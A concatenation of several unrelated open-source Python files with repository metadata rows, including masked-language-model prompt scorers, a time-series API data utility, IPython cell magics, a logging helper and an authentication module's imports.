        Take a sentence s and returns phi(s) and the rank of mask1 (cf. google doc.)
        The template vanilla is something like : "MASK1 is MASK2" thus MASK1 is rank 1 and MASK2 is rank 2
        Whereas for the transformation opposite : "MASK2 is MASK1" thus MASK1 is rank 2 and MASK2 is rank 1
        """
        # NOTE(review): the 'opposite' and 'reverse' branches are currently
        # byte-identical — confirm whether 'reverse' was meant to differ.
        if transf == 'vanilla':
            sentence = vanilla_sentence.replace('<WORD1>', N_masks_1*self.tokenizer.mask_token).replace('<WORD2>', N_masks_2*self.tokenizer.mask_token)
            mask1_rank, mask2_rank = 1, 2
        elif transf == 'opposite':
            sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
            mask1_rank, mask2_rank = 2, 1
        elif transf == 'reverse':
            sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
            mask1_rank, mask2_rank = 2, 1
        return sentence, mask1_rank, mask2_rank
#######################################
# #
# LOGICAL #
# #
#######################################
class LogicalPromptScorer:
    """Score logical connective words (e.g. 'therefore') in a single masked
    slot of implication-style prompts built over (hyponym, noun) pairs.

    A prompt follows '<PREFIX1> <DET1> <WORD1> <STRUCT_LW> <LW> <PREFIX2> <DET2> <WORD2>.'
    and is indexed by a key idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}.
    Each key yields both orders of the pair (sentence and sentence_reverse);
    scores are pickled to disk incrementally.
    """

    def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
        # Model used to compute scores
        # (model must expose compute_multiple_mono_token / compute_batch_multiple_mono_token)
        self.model = model
        self.tokenizer = tokenizer
        self.device = device
        # Load prompts materials
        self.dets_list = DETS_LIST
        self.structs_dict = {'prefixes': LOGICAL_PREFIXES_LIST,
                             'struct_lw': LOGICAL_STRUCTS_LW_LIST}
        # Define template
        self.vanilla_template = '<PREFIX1> <DET1> <WORD1> <STRUCT_LW> <LW> <PREFIX2> <DET2> <WORD2>.'
        self.key_template = '<det1>-<det2>-<prefixes>-<struct_lw>'
        # Compute keys
        self._compute_keys()
        # Where to save data
        # NOTE(review): Windows-style path separators — assumes the script runs
        # on Windows; TODO confirm.
        self.filename = 'prompts\\scores\\logical_prompts_scores_{}'.format(dataset_name)
        # Compute Prompts
        self.create_prompts()

    def _compute_keys(self):
        """
        Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
        and store them in self.list_of_keys (Cartesian product of all options).
        """
        N_dets = len(self.dets_list)
        N_prefixes = len(self.structs_dict['prefixes'])
        N_struct_lw = len(self.structs_dict['struct_lw'])

        list_of_keys = []
        for idx_det1 in range(N_dets):
            for idx_det2 in range(N_dets):
                for idx_prefixes in range(N_prefixes):
                    for idx_struct_lw in range(N_struct_lw):
                        key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
                        key = key.replace('<prefixes>', str(idx_prefixes)).replace('<struct_lw>', str(idx_struct_lw))
                        list_of_keys.append(key)
        self.list_of_keys = list_of_keys

    def _from_key_to_words(self, key):
        """
        Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
        Returns [det1, det2, prefixes, struct_lw]; prefixes is itself a pair.
        """
        list_of_idx = [int(idx) for idx in key.split('-')]
        det1 = self.dets_list[list_of_idx[0]]
        det2 = self.dets_list[list_of_idx[1]]
        prefixes = self.structs_dict['prefixes'][list_of_idx[2]]
        struct_lw = self.structs_dict['struct_lw'][list_of_idx[3]]
        return [det1, det2, prefixes, struct_lw]

    def _create_prompt(self, dets, prefixes, struct_lw):
        # Build both orderings of the prompt; <WORD1>/<WORD2>/<LW> placeholders
        # are filled later at scoring time.
        det1, det2 = dets
        prefix1, prefix2 = prefixes
        # Sentence in the right order "This is a seagull, therefore it is a bird."
        sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
        sentence = sentence.replace('<PREFIX1>', prefix1).replace('<PREFIX2>', prefix2).replace('<STRUCT_LW>', struct_lw)
        # Sentence in the reverse order "It is a bird, therefore this is a seagull."
        sentence_reverse = self.vanilla_template.replace('<DET1>', det2).replace('<DET2>', det1)
        sentence_reverse = sentence_reverse.replace('<PREFIX1>', prefix2).replace('<PREFIX2>', prefix1).replace('<STRUCT_LW>', struct_lw)
        return sentence, sentence_reverse

    def create_prompts(self):
        """
        Builds self.dict_of_prompts.
        Returns : keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
                  value [sentence, sentence_reverse]
        """
        dict_of_prompts = {}
        for key in self.list_of_keys:
            words_from_keys = self._from_key_to_words(key)
            dets, prefixes, struct_lw = words_from_keys[0:2], words_from_keys[2], words_from_keys[3]
            sentence, sentence_reverse = self._create_prompt(dets, prefixes, struct_lw)
            dict_of_prompts[key] = [sentence, sentence_reverse]
        self.dict_of_prompts = dict_of_prompts

    def compute_all_pairs_scores(self, logical_words, list_of_words):
        """
        expect words = list of pairs [HYPONYM, NOUN]
        returns : dict -> key "HYPONYM---NOUN"
                          value dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
                                        value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
        Results go to self.all_pairs_scores_dict and are pickled to
        self.filename; a previous pickle is resumed if it exists.
        """
        # Tokenize the logical words
        logical_words_ids = []
        for lw in logical_words:
            # [1:-1] strips the surrounding special tokens
            input_ids = self.tokenizer(lw)['input_ids'][1:-1]
            assert len(input_ids) == 1 # We only keep logical words mapped to a single token
            logical_words_ids.append(input_ids[0])
        # Compute Prompts Scores
        if os.path.exists(self.filename): # Previous save
            savefile = open(self.filename, 'rb')
            all_pairs_scores_dict = pickle.load(savefile)
            savefile.close()
        else:
            all_pairs_scores_dict = {}
        num_treated = 0
        for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
            word1, word2 = words
            key = word1 + '---' + word2
            if key in all_pairs_scores_dict.keys(): # If we have already computed this key go to the next
                continue
            scores_dict = self.batch_compute_one_pair_scores(logical_words_ids, words)
            all_pairs_scores_dict[key] = scores_dict
            num_treated += 1
            if num_treated % 20000 == 0: # Save from time to time
                savefile = open(self.filename, 'wb')
                pickle.dump(all_pairs_scores_dict, savefile)
                savefile.close()
        self.all_pairs_scores_dict = all_pairs_scores_dict
        # Save scores
        savefile = open(self.filename, 'wb')
        pickle.dump(all_pairs_scores_dict, savefile)
        savefile.close()

    def compute_one_pair_scores(self, logical_words_ids, words):
        """
        Sequential (non-batched) variant of batch_compute_one_pair_scores.
        expect words = [HYPONYM, NOUN]
        returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
                          value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
        """
        word1, word2 = words
        # Construct sentences (the logical word slot becomes the mask token)
        scores_dict = {}
        for key in self.list_of_keys:
            sentence, sentence_reverse = self.dict_of_prompts[key]
            sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
            sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
            # Compute scores for sentence
            encoding = self.tokenizer(sentence,
                                      return_tensors='pt'
                                      )
            input_ids = encoding['input_ids'].to(self.device)
            attention_mask = encoding['attention_mask'].to(self.device)
            mask_pos = self.find_mask_pos(input_ids)
            scores = self._compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
            # Compute scores for sentence_reverse
            encoding_reverse = self.tokenizer(sentence_reverse,
                                              return_tensors='pt'
                                              )
            input_ids_reverse = encoding_reverse['input_ids'].to(self.device)
            attention_mask_reverse = encoding_reverse['attention_mask'].to(self.device)
            mask_pos_reverse = self.find_mask_pos(input_ids_reverse)
            scores_reverse = self._compute_model_score(input_ids_reverse, attention_mask_reverse, logical_words_ids, mask_pos_reverse)
            scores_dict[key] = [scores, scores_reverse]
        return scores_dict

    def batch_compute_one_pair_scores(self, logical_words_ids, words):
        """
        Batched variant: scores both orderings of every prompt key in one forward pass.
        expect words = [HYPONYM, NOUN]
        returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
                          value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
        """
        word1, word2 = words
        # Construct sentences — batch rows alternate (sentence, sentence_reverse)
        # per key, hence the 2*k / 2*k+1 unpacking below.
        scores_dict = {}
        sentences = []
        for key in self.list_of_keys:
            sentence, sentence_reverse = self.dict_of_prompts[key]
            sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
            sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
            sentences.append(sentence)
            sentences.append(sentence_reverse)
        # Compute scores for sentence
        encoding = self.tokenizer(sentences,
                                  padding = True,
                                  return_tensors='pt')
        input_ids = encoding['input_ids'].to(self.device)
        attention_mask = encoding['attention_mask'].to(self.device)
        mask_pos = self.find_mask_pos(input_ids)
        scores = self._batch_compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
        for k in range(len(self.list_of_keys)):
            key = self.list_of_keys[k]
            scores_dict[key] = [scores[2*k], scores[2*k + 1]]
        return scores_dict

    def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
        # Probability of each candidate logical word at the single mask position.
        # Compute the probabilities and ranks from the model
        with torch.no_grad():
            probs_n_ranks = self.model.compute_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
        # Compute scores
        scores = probs_n_ranks[:,0] # drop rank
        return scores

    def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
        # Batched version; returns probabilities directly (no ranks).
        # Compute the probabilities and ranks from the model
        with torch.no_grad():
            probs = self.model.compute_batch_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
        return probs

    def find_mask_pos(self, ids_seq):
        # Column index of every mask token in the batch.
        # NOTE(review): 103 is hard-coded as the mask token id — presumably a
        # BERT tokenizer; verify against self.tokenizer.mask_token_id.
        return torch.where(ids_seq == 103)[1]
| 44.171271 | 197 | 0.603836 | 23,286 | 0.970857 | 0 | 0 | 0 | 0 | 0 | 0 | 6,429 | 0.268043 |
d3840f69ec82ddf2ce2d8d629107b8b236ee07e4 | 7,861 | py | Python | common/util/data.py | minkefusiji/TimeSeriesAnalysisPlugin | 85baac82cece9bac7cabb053673df7cc20efa50d | [
"MIT"
] | null | null | null | common/util/data.py | minkefusiji/TimeSeriesAnalysisPlugin | 85baac82cece9bac7cabb053673df7cc20efa50d | [
"MIT"
] | null | null | null | common/util/data.py | minkefusiji/TimeSeriesAnalysisPlugin | 85baac82cece9bac7cabb053673df7cc20efa50d | [
"MIT"
] | null | null | null | import requests
import json
import os
import sys
import shutil
from .azureblob import AzureBlob
from .azuretable import AzureTable
from .timeutil import get_time_offset, str_to_dt, dt_to_str
from .series import Series
from .constant import STATUS_SUCCESS, STATUS_FAIL
from telemetry import log
# To get the meta of a specific metric from TSANA
# Parameters:
# config: a dict object which should include TSANA_API_KEY, TSANA_API_ENDPOINT, SERIES_LIMIT
# metric_id: a UUID string
# Return:
# meta: the meta of the specified metric, or None if there is something wrong.
def get_metric_meta(config, metric_id):
    """Fetch the metadata of a single metric from the TSANA service.

    Parameters:
        config: object exposing tsana_api_key and tsana_api_endpoint
        metric_id: UUID string identifying the metric
    Returns:
        The parsed JSON metadata dict, or None when the service does not
        answer with HTTP 200.
    """
    request_headers = {
        "x-api-key": config.tsana_api_key,
        "Content-Type": "application/json"
    }
    url = config.tsana_api_endpoint + '/metrics/' + metric_id + '/meta'
    response = requests.get(url, headers = request_headers)
    # Guard clause: anything but 200 means the metric meta is unavailable.
    if response.status_code != 200:
        return None
    return response.json()
# Verify if the data could be used for this application
# Parameters:
# series_sets: a array of series set
# parameters: parameters of this application.
# Return:
# result: STATUS_FAIL / STATUS_SUCCESS
# message: a description of the result
def do_verify(config, parameters, subscription):
# common headers
headers = {
# The key to access TSANA
"x-api-key": config.tsana_api_key,
"Content-Type": "application/json"
}
# ------TO BE REPLACED: Other application just replace below part-------
# For forecast, check the factors and target has same granularity, and each factor could only contain one series
meta = get_metric_meta(config, parameters['instance']['params']['target']['metricId'])
if meta is None:
return STATUS_FAIL, 'Target is not found. '
target_gran = meta['granularityName']
# Only for custom, the granularity amount is meaningful which is the number of seconds
target_gran_amount = meta['granularityAmount']
for data in parameters['seriesSets']:
if target_gran != data['metricMeta']['granularityName'] or (target_gran == 'Custom' and target_gran_amount != data['metricMeta']['granularityAmount']):
return STATUS_FAIL, 'Granularity must be identical between target and factors. '
# Check series count, and each factor should only contain 1 series
seriesCount = 0
for data in parameters['seriesSets']:
dim = {}
for dimkey in data['dimensionFilter']:
dim[dimkey] = [data['dimensionFilter'][dimkey]]
dt = dt_to_str(str_to_dt(meta['dataStartFrom']))
para = dict(metricId=data['metricId'], dimensions=dim, count=2, startTime=dt) # Let's said 100 is your limitation
response = requests.post(config.tsana_api_endpoint + '/metrics/' + data['metricId'] + '/rank-series', data = json.dumps(para), headers = headers)
ret = response.json()
if ret is None or response.status_code != 200 or 'value' not in ret:
return STATUS_FAIL, 'Read series rank filed. '
seriesCount += len(ret['value'])
if seriesCount > config.series_limit:
return STATUS_FAIL, 'Cannot accept ambiguous factors or too many series in the group, limit is ' + str(config.series_limit) + '.'
return STATUS_SUCCESS, ''
# Query time series from TSANA
# Parameters:
# config: a dict object which should include TSANA_API_KEY, TSANA_API_ENDPOINT
# series_sets: Array of series set
# start_time: inclusive, the first timestamp to be query
# end_time: exclusive
# offset: a number will be added to each timestamp of each time-series. The unit is defined by granularity
# granularityName: if Offset > 0, the granularityName is Monthly / Weekly / Daily / Hourly / Minutely / Secondly / Custom
# granularityAmount: if granularityName is Custom, granularityAmount is the seconds of the exact granularity
# Return:
# A array of Series object
def get_timeseries(config, series_sets, start_time, end_time, offset = 0, granularityName = None, granularityAmount = 0):
# common headers
headers = {
"x-api-key": config.tsana_api_key,
"Content-Type": "application/json"
}
if offset != 0 and granularityName is None:
offset = 0
end_str = dt_to_str(end_time)
start_str = dt_to_str(start_time)
dedup = {}
series = []
# Query each series's tag
for data in series_sets:
dim = {}
if 'dimensionFilter' not in data:
data['dimensionFilter'] = data['filters']
for dimkey in data['dimensionFilter']:
dim[dimkey] = [data['dimensionFilter'][dimkey]]
para = dict(metricId=data['metricId'], dimensions=dim, count=1, startTime=start_str, endTime=end_str)
response = requests.post(config.tsana_api_endpoint + '/metrics/' + data['metricId'] + '/rank-series', data = json.dumps(para), headers = headers)
if response.status_code == 200:
ret = response.json()
for s in ret['value']:
if s['seriesId'] not in dedup:
s['startTime'] = start_str
s['endTime'] = end_str
s['dimension'] = s['dimensions']
del s['dimensions']
series.append(s)
dedup[s['seriesId']] = True
else:
log.info("Fail to call rank %s", json.dumps(para))
return None
# Query the data
multi_series_data = None
if len(series) > 0:
response = requests.post(config.tsana_api_endpoint + '/metrics/series/data', data = json.dumps(dict(value=series)), headers = headers)
if response.status_code == 200:
ret = response.json()
if granularityName is not None:
multi_series_data = [
Series(factor['id']['metricId'], factor['id']['seriesId'], factor['id']['dimension'],
[dict(timestamp = get_time_offset(str_to_dt(y[0]), (granularityName, granularityAmount),
offset)
, value = y[1])
for y in factor['values']])
for factor in ret['value']
]
else:
multi_series_data = [
Series(factor['id']['metricId'], factor['id']['seriesId'], factor['id']['dimension'],
value = [dict(timestamp = y[0]
, value = y[1])
for y in factor['values']])
for factor in ret['value']
]
else:
log.info("Fail to call %s ", json.dumps(para))
else:
log.info("Series is empty")
return multi_series_data
def upload_data(config, data_dir, model_key, time_key):
zip_file_base = os.path.join(config.model_temp_dir, 'data')
zip_file = zip_file_base + '.zip'
if os.path.exists(zip_file):
os.remove(zip_file)
shutil.make_archive(zip_file_base, 'zip', data_dir)
azure_blob = AzureBlob(config.az_tsana_model_blob_connection)
container_name = config.tsana_app_name
blob_name = model_key + '_' + time_key
try:
azure_blob.create_container(container_name)
except:
print("Unexpected error:", sys.exc_info()[0])
with open(zip_file, "rb") as data:
azure_blob.upload_blob(container_name, blob_name, data)
os.remove(zip_file)
data_blob_info = {}
data_blob_info['az_blob_connection'] = config.az_tsana_model_blob_connection
data_blob_info['container_name'] = container_name
data_blob_info['blob_name'] = blob_name
return data_blob_info | 42.263441 | 159 | 0.618369 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,706 | 0.344231 |
d38426706b82675c8a7c667f7422351da30f26ac | 435 | py | Python | src/thespian/sourcetree/__init__.py | mtttech/yari-dnd | bcb9d5dbbd38b09e3ac25f7a9d5d88b66b000d1a | [
"MIT"
] | 1 | 2022-03-28T16:10:15.000Z | 2022-03-28T16:10:15.000Z | src/thespian/sourcetree/__init__.py | mtttech/dndpersonae | c4fa129d1e940c9f9a5e29d703e3988b45d90356 | [
"MIT"
] | null | null | null | src/thespian/sourcetree/__init__.py | mtttech/dndpersonae | c4fa129d1e940c9f9a5e29d703e3988b45d90356 | [
"MIT"
] | null | null | null | from .dnd5e import dnd5e_sources
class SourceTree:
backgrounds: object = dnd5e_sources["backgrounds"]
classes: object = dnd5e_sources["classes"]
feats: object = dnd5e_sources["feats"]
metrics: object = dnd5e_sources["metrics"]
races: object = dnd5e_sources["races"]
skills: object = dnd5e_sources["skills"]
subclasses: object = dnd5e_sources["subclasses"]
subraces: object = dnd5e_sources["subraces"]
| 33.461538 | 54 | 0.71954 | 399 | 0.917241 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.172414 |
d3844d5e720aff870756038cd3b7757937565096 | 1,087 | py | Python | controllerconfig/controllerconfig/controllerconfig/common/log.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | controllerconfig/controllerconfig/controllerconfig/common/log.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | controllerconfig/controllerconfig/controllerconfig/common/log.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | 1 | 2021-01-05T16:24:58.000Z | 2021-01-05T16:24:58.000Z | #
# Copyright (c) 2014 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
"""
Logging
"""
import logging
import logging.handlers
_loggers = {}
def get_logger(name):
""" Get a logger or create one """
if name not in _loggers:
_loggers[name] = logging.getLogger(name)
return _loggers[name]
def setup_logger(logger):
""" Setup a logger """
# Send logs to /var/log/platform.log
syslog_facility = logging.handlers.SysLogHandler.LOG_LOCAL1
formatter = logging.Formatter("configassistant[%(process)d] " +
"%(pathname)s:%(lineno)s " +
"%(levelname)8s [%(name)s] %(message)s")
handler = logging.handlers.SysLogHandler(address='/dev/log',
facility=syslog_facility)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
def configure():
""" Setup logging """
for logger in _loggers:
setup_logger(_loggers[logger])
| 21.74 | 74 | 0.608096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 320 | 0.294388 |
d386b37d9a3c4a1c62ccd7ab2fded76f0930d665 | 357 | py | Python | rastervision/command/train_command.py | AirbusAerial/raster-vision | cfa7826169392e497fb57a540eb952fc6cee3a98 | [
"Apache-2.0"
] | 2 | 2019-04-17T13:04:23.000Z | 2020-10-04T10:28:27.000Z | rastervision/command/train_command.py | Yochengliu/raster-vision | f5badc387df86ce02d84e0e274a08026dbf65bd6 | [
"Apache-2.0"
] | null | null | null | rastervision/command/train_command.py | Yochengliu/raster-vision | f5badc387df86ce02d84e0e274a08026dbf65bd6 | [
"Apache-2.0"
] | null | null | null | import click
from rastervision.command import Command
class TrainCommand(Command):
def __init__(self, task):
self.task = task
def run(self, tmp_dir=None):
if not tmp_dir:
tmp_dir = self.get_tmp_dir()
msg = 'Training model...'
click.echo(click.style(msg, fg='green'))
self.task.train(tmp_dir)
| 21 | 48 | 0.621849 | 299 | 0.837535 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.072829 |
d387b0b7199eff1982faf21fdb262d2cc1e7704b | 10,220 | py | Python | htools/magics.py | hdmamin/htools | 620c6add29561b77c10d793e4be7beeb28b32bab | [
"MIT"
] | 1 | 2019-12-14T15:24:38.000Z | 2019-12-14T15:24:38.000Z | htools/magics.py | hdmamin/htools | 620c6add29561b77c10d793e4be7beeb28b32bab | [
"MIT"
] | null | null | null | htools/magics.py | hdmamin/htools | 620c6add29561b77c10d793e4be7beeb28b32bab | [
"MIT"
] | 1 | 2020-03-30T17:26:39.000Z | 2020-03-30T17:26:39.000Z | import inspect
from IPython.core.interactiveshell import InteractiveShell
from IPython.core.magic import cell_magic, magics_class, Magics
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
import warnings
from htools.meta import timebox
@magics_class
class InteractiveMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def talk(self, line=None, cell=None):
"""When Jupyter notebook is in default mode where
ast_node_interactivity=last (i.e. only the last unprinted statement is
displayed), this will run the current cell while printing all
statements. It then resets the mode so future cells only print the last
statement again.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic displays both lines of output, while the
other cells only display the last output.
>>> 5 + 10
>>> 6 + 11
17
%%talk
>>> 6 + 2
>>> 3 + 1
8
4
>>> 1 + 2
>>> 3 + 4
7
"""
self._adjust_verbosity(cell, 'all', parse_argstring(self.talk, line))
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def hush(self, line=None, cell=None):
"""The reverse of the `talk` magic. When the notebook is in
ast_node_interactivty='all' mode, this can be used to suppress outputs
other than the last one for a single cell. Cells that follow will
return to the display mode set for the whole notebook.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic only displays the last line of output,
while the other cells display both outputs.
>>> 5 + 10
>>> 6 + 11
15
17
%%hush
>>> 6 + 2
>>> 3 + 1
4
>>> 1 + 2
>>> 3 + 4
3
7
"""
self._adjust_verbosity(cell, 'last', parse_argstring(self.hush, line))
@cell_magic
@magic_arguments()
@argument('-p', action='store_true',
help='Boolean flag. If passed, the change will apply for the '
'rest of the notebook, or until the user changes it again. '
'The default behavior is to apply the change only to the '
'current cell.')
def mute(self, line=None, cell=None):
"""A more extreme version of the `hush` magic that suppresses all
output from a cell. Cells that follow will return to the default mode
of ast_node_interactivity='last' unless the -p flag (for persist) is
provided.
Examples
---------
In the example below, each cell contains two statements. Notice that
the cell containing the magic displays no output, while the other cells
display the final output.
>>> 5 + 10
>>> 6 + 11
17
%%mute
>>> 6 + 2
>>> 3 + 1
>>> 1 + 2
>>> 3 + 4
7
"""
self._adjust_verbosity(cell, 'none', parse_argstring(self.mute, line))
def _adjust_verbosity(self, cell, mode, args):
old_setting = InteractiveShell.ast_node_interactivity
InteractiveShell.ast_node_interactivity = mode
self.shell.run_cell(cell)
if not args.p:
InteractiveShell.ast_node_interactivity = old_setting
@magics_class
class WarningMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-p', action='store_true', help='Boolean flag. If passed, the '
'change will apply for the rest of the notebook, or until the '
'user changes it again. The default behavior is to apply the '
'change only to the current cell.')
def lax(self, line, cell):
"""Silence warnings for a cell. The -p flag can be used to make the
change persist, at least until the user changes it again.
"""
args = parse_argstring(self.lax, line)
self._warn(cell, 'ignore', args.p)
@cell_magic
@magic_arguments()
@argument('-p', action='store_true', help='Boolean flag. If passed, the '
'change will apply for the rest of the notebook, or until the '
'user changes it again. The default behavior is to apply the '
'change only to the current cell.')
def nag(self, line, cell):
"""Silence warnings for a cell. The -p flag can be used to make the
change persist, at least until the user changes it again.
"""
args = parse_argstring(self.nag, line)
self._warn(cell, 'always', args.p)
def _warn(self, cell, mode, persist):
"""Base method for lax and nag. These could easily be handled in a
single method with optional flags, but I find the usage to be more
intuitive when the names are different, and generally prefer flag-free
magics since the goal is ease of use.
The persist flag is processed in the child methods because parsing
references the method that was called.
"""
warnings.filterwarnings(mode)
self.shell.run_cell(cell)
# Reset manually because warnings.resetwarnings() behaved erratically.
if not persist:
out_modes = {'ignore', 'always'}
out_modes.remove(mode)
warnings.filterwarnings(list(out_modes)[0])
@magics_class
class FunctionRacerMagic(Magics):
@cell_magic
@magic_arguments()
@argument('-n', help='Number of loops when timing functions (inner loop).')
@argument('-r', help='Number of runs when timing functions (outer loop).')
def race(self, line, cell):
"""Time 2 or more functions to allow the user to easily compare speeds.
Each line will be timed separately, so a function call cannot take up
multiple lines. This is essentially a convenient wrapper for the
%%timeit magic that ensures all functions are timed with the same
choice of parameters. (When timing each function separately, I found
that during the testing process I would often end up changing some
function or timeit parameters in one case but forget to change it for
another. This magic aims to prevent that situation.)
Examples
---------
Example 1: A fairly standard case where we time three possible
implementations of a function to see which is fastest.
%%race -n 10 -r 3
>>> tokenizer_v1(text)
>>> tokenizer_v2(text)
>>> tokenizer_v3(text)
Example 2: If a function requires many arguments or if parameter
names are long, consider passing in a list or dictionary of arguments.
%%race
>>> many_args_func_v1(**params)
>>> many_args_func_v2(**params)
"""
args = parse_argstring(self.race, line)
n = args.n or 5
r = args.r or 3
# Split cell into lines of code to execute.
rows = [row for row in cell.strip().split('\n')
if not row.startswith('#')]
prefix = f'%timeit -n {n} -r {r} '
for row in rows:
self.shell.run_cell(prefix + row)
@magics_class
class TimeboxMagic(Magics):
"""Timebox a cell's execution to a user-specified duration. As with any
standard try/except block, note that values can change during execution
even if an error is eventually thrown (i.e. no rollback occurs).
Sample usage:
%%timebox 3
# Throw error if cell takes longer than 3 seconds to execute.
output = slow_function(*args)
%%timebox 3 -p
# Attempt to execute cell for 3 seconds, then give up. Message is printed
# stating that time is exceeded but no error is thrown.
output = slow_function(*args)
"""
@cell_magic
@magic_arguments()
@argument('time', type=int,
help='Max number of seconds before throwing error.')
@argument('-p', action='store_true',
help='Boolean flag: if provided, use permissive '
'execution (if the cell exceeds the specified '
'time, no error will be thrown, meaning '
'following cells can still execute.) If '
'flag is not provided, default behavior is to '
'raise a TimeExceededError and halt notebook '
'execution.')
def timebox(self, line=None, cell=None):
args = parse_argstring(self.timebox, line)
if args.p: cell = self._make_cell_permissive(cell)
with timebox(args.time) as tb:
self.shell.run_cell(cell)
@staticmethod
def _make_cell_permissive(cell):
"""Place whole cell in try/except block. Built-in error handling in
timebox context manager doesn't work because ipython shell has
its own logic for error handling, so we need to do this messy string
manipulation.
"""
robust_cell = (
'try:\n\t' + cell.replace('\n', '\n\t')
+ '\nexcept:\n\tprint("Time exceeded. '
'\\nWarning: objects may have changed during execution.")'
)
return robust_cell
# Automatically register all magics defined in this module.
magics = (obj for obj in map(locals().get, dir())
if inspect.isclass(obj)
and obj.__name__ != 'Magics'
and issubclass(obj, Magics))
get_ipython().register_magics(*magics)
| 35.486111 | 79 | 0.609002 | 9,573 | 0.936693 | 0 | 0 | 9,629 | 0.942172 | 0 | 0 | 6,573 | 0.643151 |
d3891e3d0186411e4c72b16b384e7e13ef7cce0a | 395 | py | Python | tests/test_msal.py | narongdejsrn/django-rest-framework-msal | 0e969aadf7a681b24b630c008f05be1d339d0df4 | [
"MIT"
] | 3 | 2020-04-22T01:56:41.000Z | 2021-06-22T15:21:57.000Z | tests/test_msal.py | narongdejsrn/django-rest-framework-msal | 0e969aadf7a681b24b630c008f05be1d339d0df4 | [
"MIT"
] | 2 | 2021-01-08T09:04:16.000Z | 2021-07-20T19:43:15.000Z | tests/test_msal.py | narongdejsrn/django-rest-framework-msal | 0e969aadf7a681b24b630c008f05be1d339d0df4 | [
"MIT"
] | 4 | 2020-05-25T07:34:37.000Z | 2021-06-11T07:37:59.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test-msal
------------
Tests for MSAL Connection
"""
from django.test import TestCase
from drf_msal_jwt.utils import build_auth_url
class TestMSAL(TestCase):
def setUp(self):
pass
def test_login_url(self):
login_url = build_auth_url()
self.assertIsNotNone(login_url)
def tearDown(self):
pass
| 14.62963 | 45 | 0.637975 | 206 | 0.521519 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.255696 |
d3898090b566ac68c831a2bc03a18937bcdbab69 | 25,135 | py | Python | server/athenian/api/auth.py | athenianco/athenian-api | dd5556101a8c49703d6b0516e4268b9e8d8eda5b | [
"RSA-MD"
] | 9 | 2020-10-11T22:12:03.000Z | 2022-02-26T02:16:45.000Z | server/athenian/api/auth.py | athenianco/athenian-api | dd5556101a8c49703d6b0516e4268b9e8d8eda5b | [
"RSA-MD"
] | 246 | 2019-12-05T06:37:30.000Z | 2022-03-29T10:00:07.000Z | server/athenian/api/auth.py | athenianco/athenian-api | dd5556101a8c49703d6b0516e4268b9e8d8eda5b | [
"RSA-MD"
] | 5 | 2019-12-04T22:38:05.000Z | 2021-02-26T00:50:04.000Z | import asyncio
from datetime import datetime, timedelta
import functools
from http import HTTPStatus
import logging
import os
import pickle
from random import random
import re
import struct
from typing import Any, Callable, Coroutine, Dict, List, Optional, Sequence, Tuple
import warnings
import aiohttp.web
from aiohttp.web_runner import GracefulExit
import aiomcache
from connexion.exceptions import AuthenticationProblem, OAuthProblem, Unauthorized
from connexion.lifecycle import ConnexionRequest
import connexion.security
from connexion.utils import deep_get
with warnings.catch_warnings():
# this will suppress all warnings in this block
